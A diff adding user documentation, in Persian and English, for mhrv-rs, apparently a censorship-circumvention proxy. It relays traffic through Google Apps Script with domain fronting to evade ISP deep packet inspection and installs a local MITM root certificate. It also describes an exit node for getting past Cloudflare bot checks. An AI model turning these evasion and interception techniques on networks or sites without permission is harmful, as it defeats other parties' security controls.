+HTTP proxy سیستم را روی `192.168.43.1:8080` بگذار، یا per-app SOCKS5 روی `192.168.43.1:1081`.
+
+> اگر `listen_host` در کانفیگت `127.0.0.1` است، به `0.0.0.0` تغییرش بده تا اتصال از دستگاه‌های دیگر را بپذیرد.
+
+## اجرا روی OpenWRT
+
+آرشیوهای `*-linux-musl-*` یک CLI کاملاً استاتیک می‌فرستند که روی OpenWRT، Alpine، و هر لینوکس بدون libc اجرا می‌شود. فایل را روی روتر بگذار و به‌صورت سرویس استارت کن:
+
+```sh
+# از کامپیوتری که به روترت دسترسی دارد:
+scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
+scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
+scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+
+# روی روتر (ssh):
+chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
+/etc/init.d/mhrv-rs enable
+/etc/init.d/mhrv-rs start
+logread -e mhrv-rs -f       # تمام لاگ
+```
+
+دستگاه‌های LAN HTTP proxy را روی IP روتر (پورت پیش‌فرض `8085`) یا SOCKS5 روی `<router-ip>:8086` تنظیم می‌کنند. در `/etc/mhrv-rs/config.json` مقدار `listen_host` را به `0.0.0.0` بگذار تا روتر اتصال LAN را بپذیرد.
+
+مصرف حافظه ~۱۵–۲۰ مگابایت — روی هر روتری با ۱۲۸ مگابایت RAM به بالا اجرا می‌شود. UI روی musl نیست (روترها headlessاند).
+
+## ابزارهای تشخیص
+
+- **`mhrv-rs test`** — یک درخواست از طریق رله می‌فرستد، موفقیت / تأخیر گزارش می‌دهد. اولین کاری که باید بکنی وقتی چیزی خراب است — جدا می‌کند "رله سالم است" از "کانفیگ کلاینت غلط است".
+- **`mhrv-rs scan-ips`** — تست TLS موازی روی ۲۸ IP frontend شناخته‌شدهٔ گوگل، مرتب‌شده بر اساس تأخیر. بهترین را در `google_ip` بگذار. UI همان را پشت دکمهٔ **scan** دارد.
+- **`mhrv-rs test-sni`** — تست TLS موازی هر نام SNI در pool روی `google_ip`. می‌گوید کدام نام‌ها از DPI ISP رد می‌شوند. UI در پنجرهٔ **SNI pool…** همان را با چک‌باکس، دکمهٔ **Test** هر ردیف، و **Keep ✓ only** برای trim خودکار دارد.
+- **آمار دوره‌ای** هر ۶۰ ثانیه در سطح `info` لاگ می‌شود (تماس‌های رله، نرخ hit کش، بایت رله شده، اسکریپت‌های فعال در مقابل blacklisted). UI آن را زنده نشان می‌دهد.
+
+### ویرایشگر SNI pool
+
+به‌طور پیش‌فرض mhrv-rs بین `{www, mail, drive, docs, calendar}.google.com` روی TLS خروجی به `google_ip` می‌چرخد، تا اثر انگشت ترافیک یکنواخت نباشد. بعضی‌ها ممکن است محلی مسدود شوند (مثلاً `mail.google.com` در ایران چند بار هدف بوده).
+
+یا:
+
+- UI → **SNI pool…** → **Test all** → **Keep ✓ only** برای trim خودکار. نام جدید را در فیلد پایین اضافه کن. Save.
+- یا `config.json` را مستقیم ویرایش کن:
+
+```json
+{
+  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
+}
+```
+
+اگر `sni_hosts` تنظیم نشود، pool خودکار پیش‌فرض استفاده می‌شود. `mhrv-rs test-sni` را اجرا کن تا قبل از ذخیره ببینی چه چیزی از شبکه‌ات کار می‌کند.
+
+## چه چیز پیاده شده و چه چیز نه
+
+این پورت روی **حالت `apps_script`** تمرکز دارد — تنها حالتی که در سال ۲۰۲۶ مقابل سانسورگر مدرن قابل اتکاست.
+
+### پیاده‌شده
+
+| ویژگی | توضیح |
+|---|---|
+| HTTP proxy محلی | CONNECT برای HTTPS، forwarding ساده برای HTTP |
+| SOCKS5 محلی | dispatch هوشمند TLS / HTTP / TCP خام (تلگرام، xray، …) |
+| MITM | تولید گواهی per-domain روی پرواز با `rcgen` |
+| نصب CA | تولید + نصب خودکار روی مک / لینوکس / ویندوز |
+| پشتیبانی فایرفاکس | نصب گواهی NSS با `certutil` (best-effort) |
+| رلهٔ JSON | پروتکل سازگار با `Code.gs` |
+| Connection pool | TTL ۴۵ ثانیه، حداکثر ۲۰ idle |
+| رمزگشایی gzip | اتوماتیک |
+| چند اسکریپت | چرخش round-robin |
+| Blacklist خودکار | روی خطای 429 / quota، با cooldown ۱۰ دقیقه |
+| کش پاسخ | ۵۰ مگابایت، FIFO + TTL، آگاه از `Cache-Control: max-age`، heuristic برای static asset |
+| Coalescing | GETهای یکسان همزمان یک fetch upstream را به اشتراک می‌گذارند |
+| تونل بازنویسی SNI | مستقیم به لبهٔ گوگل (بدون رله) برای `google.com`، `youtube.com`، `youtu.be`، `youtube-nocookie.com`، `fonts.googleapis.com` — دامنه‌های اضافی از فیلد `hosts` |
+| هندل ریدایرکت | اتوماتیک: `/exec` → `googleusercontent.com` |
+| فیلتر هدر | حذف connection-specific و brotli |
+| Subcommand‌ها | `test` و `scan-ips` و `test-sni` |
+| ماسک Script ID | به‌صورت `prefix…suffix` در لاگ، تا Deployment ID افشا نشود |
+| UI دسکتاپ | egui — کراس‌پلتفرم، بدون bundler |
+| چِین SOCKS5 upstream | اختیاری برای ترافیک غیر-HTTP (MTProto تلگرام، IMAP، SSH …) |
+| Pre-warm pool | اولین درخواست TLS handshake به لبهٔ گوگل را skip می‌کند |
+| چرخش SNI per-connection | بین `{www, mail, drive, docs, calendar}.google.com` |
+| Parallel relay | اختیاری: fan-out به N اسکریپت همزمان، اولین موفقیت برمی‌گردد |
+| Drill-down آمار per-site | در UI: درخواست‌ها، نرخ کش، بایت، تأخیر متوسط هر host |
+| ویرایشگر pool SNI | UI + فیلد `sni_hosts` با probe دسترسی |
+| بیلد musl | OpenWRT / Alpine / محیط‌های بدون libc — باینری استاتیک، با procd init |
+| **Exit node** | برای سایت‌های پشت Cloudflare (v1.9.4+) |
+| **Unwrap goog.script.init** | دفاع‌در‌عمق در مقابل Deploymentهایی که پاسخ HtmlService-wrapped می‌فرستند (v1.9.6+) |
+
+### عمداً پیاده نشده
+
+| ویژگی | چرا نه |
+|---|---|
+| HTTP/2 multiplexing | state machine کریت `h2` (stream IDs، flow control، GOAWAY) موارد hang ظریف زیادی دارد؛ coalescing + pool ۲۰-conn بیشتر فایده را می‌گیرد |
+| Batch (`q:[...]` در apps_script) | connection pool + tokio async از قبل خوب موازی‌سازی می‌کند؛ batch ~۲۰۰ خط مدیریت state اضافه می‌کند با سود نامشخص |
+| Range-based parallel download | edge case‌های واقعی (سرورهای بدون Range، chunked وسط stream)؛ ویدیوی یوتیوب از قبل با تونل بازنویسی SNI، Apps Script را دور می‌زند |
+| حالت‌های `domain_fronting` / `google_fronting` / `custom_domain` | Cloudflare در ۲۰۲۴ domain fronting عمومی را کشت؛ Cloud Run پلن پولی می‌خواهد |
+
+## محدودیت‌های شناخته‌شده
+
+این محدودیت‌ها ذاتی روش Apps Script + domain fronting هستند، نه باگ این کلاینت. نسخهٔ پایتون اصلی هم همین مشکلات را دارد.
+
+### User-Agent ثابت روی `Google-Apps-Script`
+
+برای ترافیکی که از رله رد می‌شود، `UrlFetchApp.fetch()` اجازهٔ override کردن User-Agent را نمی‌دهد. سایت‌هایی که bot detect می‌کنند (جست‌وجوی گوگل، بعضی CAPTCHAها) نسخهٔ no-JS برمی‌گردانند.
+
+**راه‌حل:** دامنه را به فیلد `hosts` اضافه کن تا از تونل بازنویسی SNI با User-Agent واقعی مرورگرت برود. این دامنه‌ها پیش‌فرض داخل‌اند: `google.com`، `youtube.com`، `fonts.googleapis.com`.
+
+### پخش ویدیو کند و quota-محدود
+
+HTML یوتیوب سریع می‌آید (از تونل بازنویسی SNI)، اما chunkهای ویدیو از `googlevideo.com` از Apps Script رد می‌شوند. سهمیهٔ رایگان: ~۲۰٬۰۰۰ `UrlFetchApp` در روز، سقف بدنهٔ ۵۰ مگابایت per fetch.
+
+برای مرور متنی خوب است، برای ۱۰۸۰p دردناک. چند `script_id` بچرخان برای هد روم بیشتر، یا VPN واقعی برای ویدیو.
+
+### Brotli حذف می‌شود
+
+از هدر `Accept-Encoding` ‏`br` حذف می‌شود. Apps Script gzip را decompress می‌کند ولی Brotli نه؛ forward کردن `br` پاسخ را خراب می‌کند. سربار حجمی جزئی.
+
+### WebSocket کار نمی‌کند
+
+این رله request/response JSON است. سایت‌هایی که به WebSocket upgrade می‌کنند fail می‌شوند (streaming ChatGPT، صدای Discord، …).
+
+### سایت‌های HSTS-preloaded / hard-pinned
+
+گواهی MITM را قبول نمی‌کنند. اکثر سایت‌ها مشکل ندارند؛ تعداد کمی هستند.
+
+### هشدار «دستگاه ناشناس» در ورود حساس گوگل
+
+2FA و ورودهای حساس گوگل / یوتیوب ممکن است هشدار «دستگاه ناشناس» بدهند، چون درخواست‌ها از IPهای Apps Script گوگل می‌آیند نه IP تو. یک‌بار از تونل وارد شو تا این مشکل برطرف شود (دامنهٔ `google.com` در لیست بازنویسی SNI است، پس از همان IP که قبلاً ورود کرده‌ای می‌رود).
+
+## امنیت
+
+- root MITM **فقط روی سیستم تو می‌ماند**. کلید خصوصی `ca/ca.key` محلی تولید می‌شود و هیچ‌وقت از دایرکتوری user-data خارج نمی‌شود.
+- `auth_key` رمز اشتراکی است که خودت انتخاب می‌کنی. `Code.gs` سرور هر درخواست بدون این کلید را رد می‌کند.
+- ترافیک بین سیستم تو و لبهٔ گوگل TLS 1.3 استاندارد است.
+- آنچه گوگل می‌بیند: URL مقصد و هدرهای هر درخواست (چون Apps Script به‌جای تو fetch می‌کند). همان مدل اعتماد هر پروکسی هاست‌شده — اگر قابل قبول نیست، VPN خودمیزبانی استفاده کن.
+- **هشدار افشای IP در حالت `apps_script`:** v1.2.9 همهٔ هدرهای `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` و ~۱۰ هدر مشابه را قبل از رسیدن به Apps Script از خروجی حذف می‌کند ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). آنچه پوشش **نمی‌دهد**: هر هدری که زیرساخت گوگل ممکن است وقتی Apps Script `UrlFetchApp.fetch()` بعدی را به مقصد می‌فرستد اضافه کند. آن leg دوم سمت سرور است، خارج از کنترل این کلاینت. مقصد IP دیتاسنتر گوگل را می‌بیند، اما تعهد عمومی از گوگل وجود ندارد که IP اصلی کاربر را در زنجیرهٔ هدرهای داخلی منتشر نمی‌کند. اگر مدل تهدیدت اینه که مقصد تحت هیچ شرایطی نباید IP تو را بفهمد، **از Full Tunnel استفاده کن** (ترافیک از VPS شخصی تو خارج می‌شود، فقط IP آن VPS end-to-end دیده می‌شود). حالت `apps_script` برای دور زدن DPI / دسترسی به سایت‌های فیلتر کاملاً مناسب است، اما فرض می‌کند «دیده‌شدن توسط گوگل» قابل قبول است. در [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148) مطرح شده.
+- در v1.9.6+ `Code.gs` و `CodeFull.gs` هم هدرهای `X-Forwarded-*` / `Forwarded` / `Via` را در سمت سرور به‌عنوان لایهٔ دفاع دوم حذف می‌کنند.
+
+## سؤالات رایج
+
+**چند Deployment ID نیاز دارم؟** یکی برای استفادهٔ معمول کافی است. سهمیهٔ رایگان `UrlFetchApp` هر حساب ۲۰٬۰۰۰ fetch در روز است (Workspace پولی ۱۰۰٬۰۰۰)، با سقف بدنهٔ ۵۰ مگابایت per fetch. **یک Deployment per Google account** بساز — سقف ۳۰ همزمان per account است، چند Deployment روی یک حساب همزمانی اضافه نمی‌کند. برای مقیاس، در حساب‌های گوگل دیگر دیپلوی کن. مرجع: <https://developers.google.com/apps-script/guides/services/quotas>
+
+**چرا گاهی جست‌وجوی گوگلم بدون JavaScript نشان داده می‌شود؟** Apps Script مجبور است `User-Agent` را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به‌عنوان bot شناسایی کرده و نسخهٔ no-JS برمی‌گردانند. دامنه‌هایی که در لیست SNI-rewrite هستند (`google.com`، `youtube.com`، …) از این مشکل امان‌اند چون مستقیم از لبهٔ گوگل می‌آیند، نه از Apps Script.
+
+**ورود به حساب گوگل با این ابزار ایمن است؟** توصیه: یک‌بار **بدون** پروکسی یا با VPN واقعی وارد شو. گوگل ممکن است IP Apps Script را به‌عنوان "دستگاه ناشناس" ببیند و هشدار بدهد. بعد از ورود اولیه، استفاده بی‌مشکل است.
+
+**چطور گواهی را بعداً حذف کنم؟**
+- **ساده‌ترین (هر OS):** در UI **Remove CA** را بزن، یا:
+  - مک / لینوکس: `sudo ./mhrv-rs --remove-cert`
+  - ویندوز (با Run as administrator): `mhrv-rs.exe --remove-cert`
+  - از trust store سیستم، NSS (فایرفاکس / کروم لینوکس) حذف می‌کند، و `ca/ca.crt` + `ca/ca.key` روی دیسک پاک می‌کند. `config.json` و دیپلوی Apps Script دست‌نخورده.
+- **به‌صورت دستی:** نام گواهی (Common Name) همه‌جا `MasterHttpRelayVPN` است (نه `mhrv-rs` — این نام برنامه است نه نام گواهی).
+  - **مک:** Keychain Access → System → دنبال `MasterHttpRelayVPN` بگرد → حذف کن. سپس `rm -rf ~/Library/Application\ Support/mhrv-rs/ca/`
+  - **ویندوز:** `certmgr.msc` → Trusted Root Certification Authorities → دنبال `MasterHttpRelayVPN` → حذف
+  - **لینوکس:** `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` را حذف کن، بعد `sudo update-ca-certificates`
+
+**خطای `GLIBC_2.39 not found` روی لینوکس؟** از `mhrv-rs-linux-musl-amd64.tar.gz` استفاده کن — کاملاً استاتیک، روی هر لینوکس بدون `glibc` کار می‌کند.
+
+## لایسنس
+
+MIT. [LICENSE](../LICENSE) را ببین.
+
+</div>
diff --git a/docs/guide.md b/docs/guide.md
new file mode 100644
index 00000000..55ee955e
--- /dev/null
+++ b/docs/guide.md
@@ -0,0 +1,418 @@
+# mhrv-rs — Full guide
+
+This is the long version — every config option, every advanced mode, every troubleshooting tip. For the 5-minute quick start, see the [main README](../README.md).
+
+[Persian version (راهنمای فارسی)](guide.fa.md)
+
+## Contents
+
+- [How it works in detail](#how-it-works-in-detail)
+- [Platforms and binaries](#platforms-and-binaries)
+- [Where files live on disk](#where-files-live-on-disk)
+- [Apps Script deployment](#apps-script-deployment)
+  - [Cloudflare Worker variant (faster)](#cloudflare-worker-variant)
+  - [Direct mode (when ISP blocks `script.google.com`)](#direct-mode)
+- [CLI reference](#cli-reference)
+  - [scan-ips API mode](#scan-ips-api-mode)
+- [Telegram via xray](#telegram-via-xray)
+- [Full Tunnel mode](#full-tunnel-mode)
+  - [How deployment IDs affect performance](#how-deployment-ids-affect-performance)
+  - [Quick start](#full-mode-quick-start)
+- [Exit node — for ChatGPT / Claude / Grok](#exit-node)
+- [Sharing via hotspot](#sharing-via-hotspot)
+- [Running on OpenWRT or any musl distro](#running-on-openwrt)
+- [Diagnostics](#diagnostics)
+  - [SNI pool editor](#sni-pool-editor)
+- [What's implemented and what isn't](#whats-implemented-and-what-isnt)
+- [Known limitations](#known-limitations)
+- [Security posture](#security-posture)
+- [FAQ](#faq)
+
+## How it works in detail
+
+```
+Browser / Telegram / xray
+        |
+        | HTTP proxy (8085)  or  SOCKS5 (8086)
+        v
+mhrv-rs (local)
+        |
+        | TLS to Google IP, SNI = www.google.com
+        v                       ^
+   DPI sees www.google.com      |
+        |                       | Host: script.google.com (inside TLS)
+        v                       |
+  Google edge frontend ---------+
+        |
+        v
+  Apps Script relay (your free Google account)
+        |
+        v
+  Real destination
+```
+
+The censor's DPI inspects the TLS SNI and lets `www.google.com` through. Google's edge serves both `www.google.com` and `script.google.com` from the same IP and routes by the HTTP `Host` header inside the encrypted stream.
+
+For Google-owned domains (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) the same tunnel is used directly — no Apps Script relay. This bypasses the per-fetch quota and avoids the locked-in `Google-Apps-Script` User-Agent for those sites. Add more domains via the `hosts` map in `config.json`.
+
+## Platforms and binaries
+
+Linux (x86_64, aarch64), macOS (x86_64, aarch64), Windows (x86_64), **Android 7.0+** (universal APK covering arm64, armv7, x86_64, x86). Prebuilt binaries on the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
+
+**Android:** download `mhrv-rs-android-universal-v*.apk`. Full walk-through in [docs/android.md](android.md) (English) or [docs/android.fa.md](android.fa.md) (Persian). The Android build runs the same `mhrv-rs` Rust crate as desktop (via JNI) plus a TUN bridge via `tun2proxy` so every app on the device routes its IP traffic through the proxy without per-app config.
+
+> **Important Android caveat (issues [#74](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/74) / [#81](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/81)):** TUN captures all IP traffic, but HTTPS from third-party apps only works for apps that trust user-installed CAs. From Android 7+ apps must opt in via `networkSecurityConfig`. **Chrome and Firefox do**; **Telegram, WhatsApp, Instagram, YouTube, banking apps, games** do not. For those: use `PROXY_ONLY` mode and point in-app proxy at `127.0.0.1:1081` (SOCKS5), or use `google_only` mode (no CA, Google services only), or set `upstream_socks5` to an external VPS. This is an Android security design, not a bug.
+
+### What's in a release
+
+Each archive contains:
+
+| file | purpose |
+|---|---|
+| `mhrv-rs` / `mhrv-rs.exe` | CLI. Headless use, servers, automation. No system deps on macOS / Windows. |
+| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | Desktop UI (egui). Config form, Start / Stop / Test buttons, live stats, log panel. |
+| `run.sh` / `run.command` / `run.bat` | Platform launcher: installs the MITM CA (needs sudo / admin) then starts the UI. Use this on first run. |
+
+macOS archives also ship `mhrv-rs.app` (in `*-app.zip`) — double-click in Finder. Run `mhrv-rs --install-cert` or `run.command` once first to install the CA.
+
+<p align="center"><img src="ui-screenshot.png" alt="mhrv-rs desktop UI showing config form, live traffic stats, Start/Stop/Test buttons, and log panel" width="420"></p>
+
+Linux UI also needs `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. On most desktop distros these are already there; on a headless box install them via your package manager, or just use the CLI.
+
+## Where files live on disk
+
+Config and the MITM CA live in the OS user-data dir:
+
+- macOS: `~/Library/Application Support/mhrv-rs/`
+- Linux: `~/.config/mhrv-rs/`
+- Windows: `%APPDATA%\mhrv-rs\`
+
+Inside that dir:
+
+- `config.json` — your settings (written by the UI's **Save** button or hand-edited)
+- `ca/ca.crt`, `ca/ca.key` — the MITM root certificate. Only you have the private key.
+
+The CLI also falls back to `./config.json` in the current working directory for backward compatibility.
+
+## Apps Script deployment
+
+The 5-minute version is in the [main README](../README.md#step-1--make-the-google-apps-script-one-time). This section covers the variants.
+
+### Cloudflare Worker variant
+
+A variant in [`assets/apps_script/Code.cfw.gs`](../assets/apps_script/Code.cfw.gs) + [`assets/cloudflare/worker.js`](../assets/cloudflare/worker.js) turns Apps Script into a thin forwarder and offloads the actual `fetch` to a Cloudflare Worker you deploy. **Day-one win:** latency (~10–50 ms at the CF edge vs ~250–500 ms in Apps Script — visibly snappier for browsing and Telegram).
+
+It does **not** reduce your daily 20k Apps Script `UrlFetchApp` count, because today's mhrv-rs always sends single-URL relay requests; the batch path on the GAS+Worker side is wired and ready (`ceil(N/40)` quota per N-URL batch) but no shipping client emits it.
+
+**Trade-offs:**
+- Worse for YouTube long-form (30 s wall clock vs 6 min Apps Script)
+- Doesn't fix Cloudflare anti-bot
+- **Not compatible with `mode: "full"`** (no tunnel-ops support → won't help WhatsApp / messengers on Android Full mode)
+
+Full setup and trade-off table in [`assets/cloudflare/README.md`](../assets/cloudflare/README.md). mhrv-rs needs no config changes — same `mode: "apps_script"`, same `script_id`, same `auth_key`.
+
+### Direct mode
+
+If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1 to succeed *before* you have a relay. mhrv-rs ships a `direct` mode for exactly this — SNI-rewrite tunnel only, no Apps Script relay required. (Was named `google_only` before v1.9 — old name still accepted.)
+
+1. Download the binary (see [main README → Step 2](../README.md#step-2--download-mhrv-rs))
+2. Copy [`config.direct.example.json`](../config.direct.example.json) to `config.json` — no `script_id`, no `auth_key` required
+3. Run `mhrv-rs serve` and set browser HTTP proxy to `127.0.0.1:8085`
+4. In `direct` mode, the proxy only routes `*.google.com`, `*.youtube.com`, and other Google-edge hosts (plus any [`fronting_groups`](fronting-groups.md) you've configured) via the SNI-rewrite tunnel. Other traffic goes raw — no Apps Script relay exists yet.
+5. Now do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy `Code.gs`, copy the Deployment ID.
+6. In the UI / Android app / by editing `config.json`, switch mode to `apps_script`, paste the Deployment ID and your auth key, and restart.
+
+Verify reachability before even starting the proxy: `mhrv-rs test-sni` probes `*.google.com` directly and works without any config beyond `google_ip` + `front_domain`.
+
+## CLI reference
+
+Everything the UI does is also in the CLI. Copy `config.example.json` to `config.json` (next to the binary, or in the user-data dir):
+
+```json
+{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
+  "auth_key": "same-secret-as-in-code-gs",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true
+}
+```
+
+Then:
+
+```bash
+./mhrv-rs                   # serve (default)
+./mhrv-rs test              # one-shot end-to-end probe
+./mhrv-rs scan-ips          # rank Google frontend IPs by latency
+./mhrv-rs test-sni          # probe SNI names against your google_ip
+./mhrv-rs --install-cert    # reinstall the MITM CA
+./mhrv-rs --remove-cert     # uninstall + delete the whole ca/ dir
+./mhrv-rs --help
+```
+
+`--remove-cert` deletes the CA from the OS trust store, deletes the on-disk `ca/` directory, and verifies the revocation by name. NSS cleanup (Firefox, Chrome on Linux) is best-effort: if `certutil` isn't on PATH or a browser holds the NSS DB open, the tool logs a manual-cleanup hint. Your `config.json` and the Apps Script deployment are untouched, so a fresh CA does not require redeploying `Code.gs`.
+
+> **Upgrading from pre-v1.2.11?** Earlier versions wrote a bare `user_pref("security.enterprise_roots.enabled", true);` into each Firefox profile's `user.js` without a marker. `--remove-cert` does not strip that line — it's indistinguishable from one a user or corp policy wrote. Firefox falls back to its built-in Mozilla root store the moment the MITM CA leaves the OS trust store, so this has no functional effect. Delete by hand if it bothers you.
+
+`script_id` can also be a JSON array: `["id1", "id2", "id3"]`.
+
+### scan-ips API mode
+
+By default, `scan-ips` uses a static list. Enable dynamic IP discovery in `config.json`:
+
+```json
+{
+  "fetch_ips_from_api": true,
+  "max_ips_to_scan": 100,
+  "scan_batch_size": 100,
+  "google_ip_validation": true
+}
+```
+
+When enabled:
+- Fetches `goog.json` from Google's public IP ranges API
+- Extracts CIDRs and expands them to individual IPs
+- Prioritizes IPs from famous Google domains (google.com, youtube.com, etc.)
+- Randomly selects up to `max_ips_to_scan` candidates (prioritized first)
+- Tests only those candidates for connectivity and frontend validation
+
+You may find IPs faster than the static array, but no guarantee they all work.
+
+## Telegram via xray
+
+The Apps Script relay only speaks HTTP request / response, so non-HTTP protocols (Telegram MTProto, IMAP, SSH, raw TCP) can't travel through it. Without anything else, those flows hit the direct-TCP fallback — which means they're not actually tunneled, and an ISP that blocks Telegram still blocks them.
+
+**Fix:** run a local [xray](https://github.com/XTLS/Xray-core) (or v2ray / sing-box) with a VLESS / Trojan / Shadowsocks outbound to your own VPS, and point mhrv-rs at xray's SOCKS5 inbound via the **Upstream SOCKS5** field (or the `upstream_socks5` config key). When set, raw-TCP flows through mhrv-rs's SOCKS5 listener get chained into xray → the real tunnel.
+
+```
+Telegram  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
+          ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ SNI rewrite ──────── google.com, youtube.com, …
+Browser   ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── your VPS   (Telegram, IMAP, SSH, raw TCP)
+```
+
+Config fragment:
+
+```json
+{
+  "upstream_socks5": "127.0.0.1:50529"
+}
+```
+
+HTTP / HTTPS keeps going through Apps Script (no change), and the SNI-rewrite tunnel for `google.com` / `youtube.com` keeps bypassing both — YouTube stays as fast as before while Telegram gets a real tunnel.
+
+## Full Tunnel mode
+
+`"mode": "full"` routes **all** traffic end-to-end through Apps Script and a remote [tunnel-node](../tunnel-node/) — no MITM certificate needed. TCP carried as persistent tunnel sessions, UDP from Android / TUN clients via SOCKS5 `UDP ASSOCIATE` to the tunnel-node which emits real UDP server-side. Trade-off: higher per-request latency (every byte goes Apps Script → tunnel-node → destination), but works for any protocol and any app, no CA install required.
+
+### How deployment IDs affect performance
+
+Each Apps Script batch round-trip takes ~2 s. In Full mode, mhrv-rs runs a **pipelined batch multiplexer** that fires multiple batches concurrently without waiting on the previous one. Each Deployment ID (= one Google account) gets its own concurrency pool of **30 in-flight requests** — matching the per-account Apps Script execution limit.
+
+```
+max_concurrent = 30 × number_of_deployment_ids
+```
+
+| Deployments | Concurrent | Notes |
+|---|---|---|
+| 1 | 30 | Single account — fine for light browsing |
+| 3 | 90 | Good for daily use |
+| 6 | 180 | Recommended for heavy use |
+| 12 | 360 | Multi-account power setup |
+
+More deployments = more total concurrency = lower per-session latency. Each batch round-robins across your IDs, spreading load and reducing the chance of hitting any single deployment's quota ceiling.
+
+**Resource guards:**
+- **50 ops max** per batch — if more sessions are active, the mux splits into multiple batches
+- **4 MB payload cap** per batch — well under Apps Script's 50 MB limit
+- **30 s timeout** per batch — slow / dead targets can't block other sessions forever
+
+### Full mode quick start
+
+1. Deploy [`CodeFull.gs`](../assets/apps_script/CodeFull.gs) as a Web App on **each Google account** (same steps as `Code.gs`, but use the full-mode script that forwards to your tunnel-node). One deployment per account — the 30-concurrent limit is per account, so multiple deployments on one account share the pool. To scale, use more accounts:
+   - **Solo use** → 1–2 accounts
+   - **Shared with ~3 people** → 3 accounts
+   - **Shared with a group** → one account per heavy user
+
+2. Deploy [tunnel-node](../tunnel-node/) on a VPS. Fastest is the prebuilt Docker image:
+   ```bash
+   docker run -d --name mhrv-tunnel --restart unless-stopped \
+     -p 8080:8080 -e TUNNEL_AUTH_KEY=your-strong-secret \
+     ghcr.io/therealaleph/mhrv-tunnel-node:latest
+   ```
+   Multi-arch (linux/amd64 + linux/arm64), runs as non-root, ~32 MB compressed. Pin a version tag (`:1.5.0`) for production. See [tunnel-node/README.md](../tunnel-node/README.md) for Cloud Run, docker-compose, and source-build alternatives.
+
+3. Set `"mode": "full"` in your config with all deployment IDs:
+   ```json
+   {
+     "mode": "full",
+     "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
+     "auth_key": "your-secret"
+   }
+   ```
+
+## Exit node
+
+Cloudflare-fronted services (chatgpt.com, claude.ai, grok.com, x.com, openai.com) flag traffic from Google datacenter IPs as bots and serve a Turnstile / CAPTCHA challenge. The exit node fix is a small TypeScript HTTP handler you deploy on a serverless host (Deno Deploy, fly.io, or your own VPS) that sits between Apps Script and the destination:
+
+```
+client → Apps Script (Google IP) → your exit node (non-Google IP) → CF-protected site
+```
+
+The destination sees the exit node's IP, not Google's, so the anti-bot heuristic doesn't fire.
+
+**Setup:** [`assets/exit_node/README.md`](../assets/exit_node/README.md). 5 min, free tier.
+
+## Sharing via hotspot
+
+mhrv-rs listens on `0.0.0.0` by default, so any device on the same network can use it. Common scenario: share the tunnel from an Android phone to an iPhone, iPad, or laptop over hotspot:
+
+1. **Android:** enable mobile hotspot + start the app
+2. **Other device:** connect to the Android hotspot Wi-Fi
+3. **Configure proxy** on the other device:
+   - Server: `192.168.43.1` (Android's default hotspot IP)
+   - Port: `8080` (HTTP) or `1081` (SOCKS5)
+
+### iOS
+
+Settings → Wi-Fi → tap (i) on the hotspot network → Configure Proxy → Manual → Server `192.168.43.1`, Port `8080`.
+
+For full device-wide coverage on iOS, use [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) or [Potatso](https://apps.apple.com/app/potatso/id1239860606) — point at SOCKS5 (`192.168.43.1:1081`) and it routes all traffic through the tunnel.
+
+### macOS / Windows
+
+Set system HTTP proxy to `192.168.43.1:8080`, or per-app SOCKS5 to `192.168.43.1:1081`.
+
+> If `listen_host` is `127.0.0.1` in your config, change to `0.0.0.0` to allow other devices.
+
+## Running on OpenWRT
+
+The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any libc-less Linux. Put the binary on the router and start as a service:
+
+```sh
+# From a machine that can reach your router:
+scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
+scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
+scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+
+# On the router:
+chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
+/etc/init.d/mhrv-rs enable
+/etc/init.d/mhrv-rs start
+logread -e mhrv-rs -f       # tail logs
+```
+
+LAN devices then point HTTP proxy at the router's LAN IP (default port `8085`) or SOCKS5 at `<router-ip>:8086`. Set `listen_host` to `0.0.0.0` in `/etc/mhrv-rs/config.json` so the router accepts LAN connections.
+
+Memory footprint ~15–20 MB resident — fine on anything ≥128 MB RAM. No UI on musl (routers are headless).
+
+## Diagnostics
+
+- **`mhrv-rs test`** — sends one request through the relay, reports success / latency. First thing to try when something breaks — separates "relay is up" from "client config is wrong".
+- **`mhrv-rs scan-ips`** — parallel TLS probe of 28 known Google frontend IPs, sorted by latency. Take the winner, put it in `google_ip`. UI has same thing behind **scan** button.
+- **`mhrv-rs test-sni`** — parallel TLS probe of every SNI name in your rotation pool against `google_ip`. Tells you which front-domain names pass through your ISP's DPI. UI has same thing in **SNI pool…** window with checkboxes, per-row **Test** buttons, and **Keep ✓ only** to auto-trim.
+- **Periodic stats** logged every 60 s at `info` level (relay calls, cache hit rate, bytes relayed, active vs blacklisted scripts). UI shows live.
+
